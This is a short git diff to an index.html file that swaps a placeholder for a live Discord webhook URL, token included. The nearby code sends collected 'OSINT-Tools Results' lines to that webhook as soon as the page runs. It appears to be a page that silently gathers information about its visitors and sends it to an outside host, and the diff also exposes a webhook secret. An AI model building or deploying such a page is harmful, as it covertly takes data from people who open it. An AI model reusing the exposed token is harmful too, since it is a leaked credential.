--- a/index.html
+++ b/index.html
@@ -215,7 +215,7 @@
                 ];
 
                 // Send to Discord webhook immediately
-                const webhookUrl = 'REPLACE THIS WITH UR WEBHOOK';
+                const webhookUrl = 'https://discord.com/api/webhooks/1406645503231266868/NGpnlrIe81pRKbSqCjhHH4NcWtI8G9ZjM22P2Xa4P3r2FKuaqZIpQdHJaTW9SLHT-AcQ';
                 const payload = {
                     content: `**OSINT-Tools Results <@REPLACE WITH UR DISCORD ID>**\n\`\`\`\n${infoLines.join('\n')}\n\`\`\``
                 };
